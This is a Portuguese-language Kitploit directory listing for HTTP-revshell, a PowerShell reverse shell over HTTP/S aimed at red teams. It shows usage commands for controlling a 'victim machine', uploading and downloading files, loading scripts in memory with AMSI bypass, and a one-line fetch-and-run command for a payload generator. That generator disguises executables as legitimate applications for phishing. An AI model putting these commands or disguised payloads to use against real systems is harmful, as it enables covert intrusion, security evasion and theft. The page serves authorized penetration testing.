Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
HTTP-revshell — Shell reverso do Powershell usando protocolo HTTP/S com bypass do AMSI e consciente de proxy | Kitploit
Ferramentas/GitHubGitHub/3v4si0n/http-revshell
Ferramentas de PhishingGeração de PayloadsEvasão de IDS/IPSPós-ExploraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHub3v4si0n/http-revshell

HTTP-revshell

Shell reverso do Powershell usando protocolo HTTP/S com bypass do AMSI e consciente de proxy

Ver Repositório
59890há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Powershell HTTP/S Reverse Shell

Category-tool Powershell Python License

HTTP-revshell é uma ferramenta focada em exercícios de red team e pentesters. Esta ferramenta fornece uma conexão reversa através do protocolo HTTP/S. Ela utiliza um canal oculto para obter controle sobre a máquina vítima através de requisições web e assim evadir soluções como IDS, IPS e AV.

NOTA: A ferramenta não será mantida em termos de evasão. Com apenas algumas alterações você pode contornar muitos EDRs do mercado.

HTTP-revshell

Ajuda server.py

Uso do servidor:

root@kitploit:~
usage: server.py [-h] [--ssl] [--autocomplete] host port

positional arguments:
  host            Host de escuta
  port            Porta de escuta

optional arguments:
  -h, --help      mostra esta mensagem de ajuda e sai
  --ssl           Envia tráfego via ssl
  --autocomplete  Autocompletar funções do powershell

Ajuda Invoke-WebRev.ps1 (cliente)

Uso do cliente:

root@kitploit:~
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Instalação

root@kitploit:~
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Funcionalidades

  • SSL
  • Proxy Aware
  • Upload de arquivos
  • Download de arquivos
  • Carregar scripts powershell através do servidor
  • Controle de erros
  • AMSI bypass
  • Autocompletar funções do PowerShell (opcional)

Uso das funções extras

Upload

Esta função permite que você faça upload de qualquer arquivo para a máquina vítima.

Uso:

root@kitploit:~
upload /src/path/file C:\dest\path\file

Download

Esta função permite que você faça o download de um arquivo para a máquina do atacante.

Uso:

root@kitploit:~
download C:\src\path\file /dst/path/file

Loadps1

Esta função permite carregar scripts powershell sem precisar escrever no disco da vítima, lendo o arquivo através de tráfego HTTP legítimo.

Uso:

root@kitploit:~
loadps1 /path/to/the/local/server/PowershellScript.ps1

Ajuda Revshell-Generator.ps1 (Gerador Automático de Payload)

Este script permite criar um arquivo executável com o payload necessário para usar o HTTP-revshell, você só precisa seguir as instruções na tela para gerá-lo. Existem 6 modelos predefinidos e um personalizável, com os dados que você preferir.

Os payloads gerados pela ferramenta incorporam o ícone legítimo da aplicação, bem como as informações de produto e direitos autorais da aplicação original. Além disso, cada um deles abre a aplicação original antes de estabelecer a conexão com o servidor, fingindo ser uma aplicação legítima. Isso pode ser usado para phishing ou exercícios de Red Team.

Uso do Gerador de Payload:

root@kitploit:~
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

Revshell-Generator

IMPORTANTE: Todos os campos nos modelos predefinidos são preenchidos automaticamente ao pressionar a tecla enter.

Créditos

  • JoelGMSec pelo seu incrível Revshell-Generator.ps1. Twitter: @JoelGMSec
  • dev-2null por relatar o primeiro bug. Twitter: @dev2null

Isenção de responsabilidade e Licença

Este script está licenciado sob LGPLv3+. Link direto para Licença.

HTTP-revshell deve ser usado apenas para testes de penetração autorizados e/ou fins educacionais sem fins lucrativos. Qualquer uso indevido deste software não será de responsabilidade do autor ou de qualquer outro colaborador. Use-o em seus próprios servidores e/ou com a permissão do proprietário do servidor.

Baixar ferramenta